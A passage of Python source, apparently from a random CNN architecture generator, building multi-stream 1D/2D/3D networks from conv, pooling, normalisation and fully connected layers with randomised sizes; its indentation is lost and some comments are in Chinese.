if(stream_output_size[0][2] > stream_output_size[1][2]):# the first stream is larger
# append one more block to the first stream to match the sizes
input_batch_size,input_channels,input_length = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index, _ = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)# make_block returns (index, channels)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:# the second stream is larger
# append one more block to the second stream to match the sizes
input_batch_size,input_channels,input_length = last_block_input_size
output_size = stream_output_size[0]
last_block_index, _ = self.make_block(last_block_input_size,output_size,last_block_index,4)# make_block returns (index, channels)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
if(random.randint(1,100) < 30):
#Add
# print("stream: appending Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2]
self.layer_parameters += params # append to the parameter vector
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # append to the layer-id list
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("stream: appending concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * len(stream_output_index)
self.layer_parameters += params # append to the parameter vector
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # append to the layer-id list
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
# generate the fully connected layers
if(random.randint(1,100) < self.delete_fc_prob * 100):
# attach no fully connected layer
return
# count the parameters of all preceding layers
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
# decide how many fully connected layers to use
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 20:
fc_num += 1
if(fc_num == self.max_fc_num):
break
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
# generate the FC layers so that they hold roughly 80% of all parameters
now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = int(fc_params_num / input_length)
if random.randint(1,100) <= 50 and output_length > 1000:
output_length = 1000
# print(fc_params_num,input_length)
assert output_length > 0, "no suitable fully connected layer found"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params # append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
else:
output_length_fc1 = 0
output_length_fc2 = 0
range_list = random.sample(range(10,1015),1000)
for i in range(1000):
output_length_fc2 = range_list[i]
output_length_fc1 = int(fc_params_num / (input_length + output_length_fc2))
if(input_length > output_length_fc1 and output_length_fc1 > output_length_fc2):
break
assert i < 999, "no suitable fully connected layer found"
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params # append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params # append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
elif(self.dimension == 2):
# generate the CNN network (2d)
stay_channel_prob = 0.5
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
# generate one stream of the multi-stream network
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," block",block)
# the blocks within one stream
input_batch_size,input_channels,input_height,input_width = last_block_input_size
out_channels = 1
out_shape = 0
# generate out_channels as 2x, 3x or 4x integer multiples of the input channels
if block < 5:
out_shape = self.prob_random([int(input_height*0.5),int(input_height/3)],[0.9,0.1])
if(input_channels <= 3):
out_channels = random.randint(16,32)
else:
out_channels = random.randint(int(input_channels*2),input_channels*3)
if(random.randint(1,100) < 30):
out_channels = self.prob_random([input_channels,input_channels*2,input_channels*3,input_channels*4,input_channels*6],[0.2,0.6,0.12,0.05,0.03])
if out_channels > 1000:
out_channels = self.prob_random([int(out_channels/4),int(out_channels/2),out_channels],[0.3,0.5,0.2])
# keep the expected value of the final out_channels stable
if(random.randint(1,100) < 20):
out_channels = input_channels
if out_shape < 7:
out_shape = input_height
else:
out_shape = self.prob_random([int(input_height*0.5),input_height],[0.1,0.9])
if(input_channels <= 300):
out_channels = self.prob_random([input_channels,input_channels*2,input_channels*3],[0.3,0.6,0.1])
else:
out_channels = self.prob_random([int(input_channels/2),input_channels,input_channels*2],[0.4,0.4,0.2])
if out_channels > 1000:
out_channels = self.prob_random([int(input_channels/4),int(input_channels/2),out_channels],[0.3,0.5,0.2])
# keep the expected value of the final out_channels stable
if(random.randint(1,100) < 20):
out_channels = input_channels
if out_shape < 7:
out_shape = input_height
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,out_shape,out_shape]
# print('output_size',output_size)
# when block = 0, the block receives the initial input (last_block_index = -1)
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
# record the output size of each stream's last block
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print("stream generation finished")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
# join the results of the different streams
if(stream_output_size[0] != stream_output_size[1]):
if(stream_output_size[0][2] > stream_output_size[1][2]):# the first stream is larger
# append one more block to the first stream to match the sizes
input_batch_size,input_channels,input_height,input_width = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index, _ = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)# make_block returns (index, channels)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:# the second stream is larger
# append one more block to the second stream to match the sizes
input_batch_size,input_channels,input_height,input_width = last_block_input_size
output_size = stream_output_size[0]
last_block_index, _ = self.make_block(last_block_input_size,output_size,last_block_index,4)# make_block returns (index, channels)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
if(random.randint(1,100) < 30):
#Add
# print("stream: appending Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3]
self.layer_parameters += params # append to the parameter vector
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # append to the layer-id list
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("stream: appending concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * len(stream_output_index)
self.layer_parameters += params # append to the parameter vector
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # append to the layer-id list
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
# generate the fully connected layers
if(random.randint(1,100) < self.delete_fc_prob * 100):
# attach no fully connected layer
return
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]
if input_length > 10000:
# insert an adaptive avg pool layer to shrink the flattened size
out_shape = random.randint(1,3)
final_output_size = [input_fc_size[0],input_fc_size[1],out_shape,out_shape]
input_ada_size = input_fc_size
input_fc_size = final_output_size
# print('adaptive',final_output_size)
params = self.make_layer(13,input_ada_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
input_fc_size = output_size
self.layer_parameters += params # append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # append to the layer-id list
self.layer_num += 1
# count the parameters of all preceding layers
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
#decide how many fully connected layers to use
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 10:
fc_num += 1
if(fc_num == self.max_fc_num):
break
# fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
# while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
# fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
# fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
# #generate FC layers whose parameters account for roughly 80% of the network
# now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]
# print('input_fc_size',input_fc_size)
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = random.randint(50,2000)
if(random.randint(1,100) < 10):
output_length = 1000
# print(fc_params_num,input_length)
# assert output_length > 0, "no suitable fully connected layer found"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
else:
#draw the widths of the two FC layers directly (the former 1000-iteration
#loop applied no constraint, so a single draw is equivalent)
output_length_fc2 = random.randint(50,2000)
output_length_fc1 = random.randint(500,2000)
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
# for i in range(0,fc_num):
# # print("layer preceding the FC layers",input_fc_size)
# batch_size = input_fc_size[0]
# if(i == fc_num - 1):
# output_length = random.randint(10,1000)
# params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
# self.layer_parameters += params #append to the parameter vector
# link_list=[self.layer_num-1]
# self.layer_link += self.get_link_vector(link_list,self.layer_num)
# self.layer_id += [21] # append to the layer-id list
# self.layer_num += 1
# input_length = output_length
# output_length = int(output_length / random.randint(10,50))
else:
#generate a 3-D CNN
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
#generate one stream of the multi-stream network
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," 第",block,"个block")
#一条中的多个block
input_batch_size,input_channels,input_depth,input_height,input_width = last_block_input_size
out_channels = 1
if(input_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(input_channels*2),input_channels*4)
output_depth = self.prob_random([int(input_depth*0.5),input_depth],[0.3,0.7])
out_shape = self.prob_random([int(input_height*0.5),input_height,int(input_height/3)],[0.7,0.2,0.1])
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,output_depth,out_shape,out_shape]
#when block == 0 the block consumes the network input, i.e. last_block_index == -1
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
#record the output size of the last block of each stream
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print('stream_output_size',stream_output_size)
# print("生成流结束")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
#merge the results of the different streams
if(stream_output_size[0] != stream_output_size[1]):
if(stream_output_size[0][2] > stream_output_size[1][2]):# the first one is larger
#add one more block to the first stream so the sizes match
input_batch_size,input_channels,input_depth,input_height,input_width = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index,channels = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:#the second one is larger
#add one more block to the second stream so the sizes match
input_batch_size,input_channels,input_depth,input_height,input_width = last_block_input_size
output_size = stream_output_size[0]
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
# print('stream_output_size',stream_output_size)
if(random.randint(1,100) < 30):
#Add
# print("流 添加Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * stream_output_size[0][4]
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("流 添加concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * stream_output_size[0][4] * len(stream_output_index)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
#generate the fully connected layers
if(random.randint(1,100) < self.delete_fc_prob * 100):
#skip the fully connected layers entirely
return
#count the parameters of all layers so far
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
#decide how many fully connected layers to use
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 20:
fc_num += 1
if(fc_num == self.max_fc_num):
break
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
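#Worked example with illustrative numbers (not taken from a real run): if
#before_fc_params_num = 1_000_000 and the sampled ratio is 0.8, the overall
#budget becomes 1_000_000/(1-0.8) = 5_000_000, leaving 4_000_000 parameters
#for the FC head -- i.e. the FC layers end up holding about 80% of the
#network, as the comment below states.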
#generate FC layers so that they hold roughly 80% of all parameters
now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]*input_fc_size[4]
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = int(fc_params_num / input_length)
# print('fc_params_num,input_length,before_fc_params_num',fc_params_num,input_length,before_fc_params_num)
assert output_length > 0, "no suitable fully connected layer found"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
else:
output_length_fc1 = 0
output_length_fc2 = 0
range_list = random.sample(range(10,1015),1000)
for i in range(1000):
output_length_fc2 = range_list[i]
output_length_fc1 = int(fc_params_num / (input_length + output_length_fc2))
if(input_length > output_length_fc1 and output_length_fc1 > output_length_fc2):
break
assert i < 999, "no suitable fully connected layer found"
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # append to the layer-id list
self.layer_num += 1
def make_block(self,input_size,output_size,last_block_index,max_branch_layer,branch_prob = 0.1):
'''
input_size: size of the input coming from the previous layer
output_size: desired output size
max_branch_layer: maximum number of layers in each branch
Generates a network block. Layers inside the block only connect to other
layers of the same block, and the block contains no FC layer.
Rules:
1) Conv, batch-norm, activation and pooling layers usually follow this order:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),
nn.ReLU(True),
nn.MaxPool2d(2, 2)
but several Conv/Pool layers may come before or after.
2) With concat the channel counts may differ; with add all shapes must match.
branch_prob: the probability of spawning one extra branch is branch_prob,
two extra branches branch_prob*branch_prob, and so on.
'''
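#Note: the loop below makes branch_num geometrically distributed,
#P(branch_num = n) = branch_prob**(n-1) * (1-branch_prob); with the default
#branch_prob = 0.1 about 90% of blocks stay single-branch, roughly 9% get
#two branches, and so on.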
# print("生成block...",input_size,output_size)
channels = output_size[1]#用来记录合并后的channels
branch_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= branch_prob*100:
branch_num += 1
if(self.dimension == 1):
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_1d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#merge the branches
if(random.randint(1,100) < 30):
#Add
#print("adding Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # append to the layer-id list
self.layer_num += 1
else:
#concat
# print("adding concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # append to the layer-id list
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
elif(self.dimension == 2):
if branch_num == 1 and input_size[1] > 256 and random.randint(1,100) <= 50:
linaer_layer_output_index = self.make_Bottleneck_layers_2d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_2d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#merge the branches
if(random.randint(1,100) < 30):
#Add
#print("adding Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # append to the layer-id list
self.layer_num += 1
else:
#concat
# print("adding concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # append to the layer-id list
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
else:
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_3d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#merge the branches
if(random.randint(1,100) < 30):
#Add
#print("adding Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # append to the layer-id list
self.layer_num += 1
else:
#concat
# print("adding concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #append to the parameter vector
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # append to the layer-id list
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
return self.layer_num - 1,channels #return the block's output node index and the merged channel count
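#Illustrative example (hypothetical sizes): three branches each ending in
#[1, 64, 14, 14] merged by concat yield 64 * 3 = 192 channels, while an add
#merge keeps the shape [1, 64, 14, 14] unchanged.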
def make_linear_layers_3d(self,last_block_index,input_size,final_output_size):
'''
Generates a linear (branch-free) CNN sub-block, for example:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6), or dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("generating make_linear_layers_3d...",input_size,final_output_size)
no_conv_prob = 0.1
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#use conv layers; if omitted, a pool layer substitutes and the following ReLU etc. are skipped
#this is only allowed when the channel counts match, otherwise the conv layer cannot be dropped
conv_num = 1
while random.randint(1,100) <= 20:
#decide how many conv layers to stack
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#add the conv layers
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#the last layer must match the target channel count
params = self.make_layer(2,last_layer_input_size,final_output_size)
else:
if random.randint(1,100) <= 20:
#conv layer
params = self.make_layer(2,last_layer_input_size)
else:
#transposed conv layer
params = self.make_layer(5,last_layer_input_size)
ConvTranspose = True
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
if(i==0):
#takes the merge node of the previous block as input
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#takes the previous node as input
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
if ConvTranspose:
self.layer_id += [5] # append to the layer-id list
self.layer_num += 1
else:
self.layer_id += [2] # append to the layer-id list
self.layer_num += 1
ConvTranspose = False
#add a BatchNorm or dropout layer
if(random.randint(1,100) < self.batchNorm_prob*100):
#add BatchNorm
params = self.make_layer(17,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [17] # append to the layer-id list
self.layer_num += 1
else:
if(random.randint(1,100) < self.dropout_prob*100):
#add Dropout
dropout_type = self.prob_random([20,26],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # append to the layer-id list
self.layer_num += 1
#add an activation layer
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # append to the layer-id list
self.layer_num += 1
#add pool/unpool layers
#add a Pool layer
if random.randint(1,100) >= 20:
params = self.make_layer(8,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [8] # append to the layer-id list
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 20:
params = self.make_layer(11,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [11] # append to the layer-id list
self.layer_num += 1
else:
params = self.make_layer(14,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [14] # append to the layer-id list
self.layer_num += 1
return self.layer_num - 1 #return the index of the last node of this linear sequence
def make_linear_layers_2d(self,last_block_index,input_size,final_output_size):
'''
Generates a linear (branch-free) CNN sub-block, for example:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6), or dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("generating make_linear_layers_2d...",input_size,final_output_size)
no_conv_prob = 0.05
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#use conv layers; if omitted, a pool layer substitutes and the following ReLU etc. are skipped
#this is only allowed when the channel counts match, otherwise the conv layer cannot be dropped
conv_num = 1
while random.randint(1,100) <= 40:
#decide how many conv layers to stack
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#add the conv layers
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#the last layer must match the target channel count
params = self.make_layer(1,last_layer_input_size,final_output_size)
else:
# if random.randint(1,100) <= 97:
#conv layer
params = self.make_layer(1,last_layer_input_size)
# else:
# #transposed conv layer
# params = self.make_layer(4,last_layer_input_size)
# ConvTranspose = True
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
if(i==0):
#takes the merge node of the previous block as input
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#takes the previous node as input
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
# if ConvTranspose:
# self.layer_id += [4] # append to the layer-id list
# self.layer_num += 1
# else:
self.layer_id += [1] # append to the layer-id list
self.layer_num += 1
ConvTranspose = False
#add an activation layer
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # append to the layer-id list
self.layer_num += 1
if(random.randint(1,100) < 80):
#add BatchNorm
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # append to the layer-id list
self.layer_num += 1
if(random.randint(1,100) < 30 and not self.no_dropout):
#add Dropout
dropout_type = self.prob_random([19,25],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # append to the layer-id list
self.layer_num += 1
#add a Pool layer
if random.randint(1,100) >= 50:
params = self.make_layer(7,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # append to the layer-id list
self.layer_num += 1
pool_type = params[-1]
# if pool_type == 0 and random.randint(1,100) <= 20:
# params = self.make_layer(10,last_layer_input_size,final_output_size)
# output_size = params[4:8]
# last_layer_input_size = output_size
# self.layer_parameters += params #append to the parameter vector
# link_list=[self.layer_num-1]
# self.layer_link += self.get_link_vector(link_list,self.layer_num)
# self.layer_id += [10] # append to the layer-id list
# self.layer_num += 1
else:
params = self.make_layer(13,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # append to the layer-id list
self.layer_num += 1
return self.layer_num - 1 #return the index of the last node of this linear sequence
def make_Bottleneck_layers_2d(self,last_block_index,input_size,final_output_size):
'''
Generates a linear (branch-free) bottleneck CNN block, for example:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6), or dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("make_Bottleneck_layers_2d...",input_size,final_output_size)
more_conv_prob = 0.2
max_conv_num = 5
conv_num = 3
last_layer_input_size = input_size
if(input_size[1] != final_output_size[1]):
#use conv layers; if omitted, a pool layer substitutes and the following ReLU etc. are skipped
#this is only allowed when the channel counts match, otherwise the conv layer cannot be dropped
conv_num = 3
while random.randint(1,100) <= 20:
#decide how many conv layers to stack
conv_num += 1
if(conv_num == max_conv_num):
break
mid_channels = self.prob_random([int(input_size[1]/6),int(input_size[1]/4),int(input_size[1]/2)],[0.3,0.4,0.3])
# print(conv_num)
#add the conv layers
for i in range(0,conv_num):
if(i==conv_num-1):
#the last layer must match the target channel count
params = self.make_layer(1,last_layer_input_size,final_output_size)
else:
params = self.make_layer(1,last_layer_input_size,[last_layer_input_size[0],mid_channels,last_layer_input_size[2],last_layer_input_size[3]])
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
if(i==0):
#takes the merge node of the previous block as input
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#takes the previous node as input
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # append to the layer-id list
self.layer_num += 1
#add an activation layer
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # append to the layer-id list
self.layer_num += 1
ConvTranspose = False
if(random.randint(1,100) < 80):
#add BatchNorm
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # append to the layer-id list
self.layer_num += 1
if(random.randint(1,100) < 30 and not self.no_dropout):
#add Dropout
dropout_type = self.prob_random([19,25],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
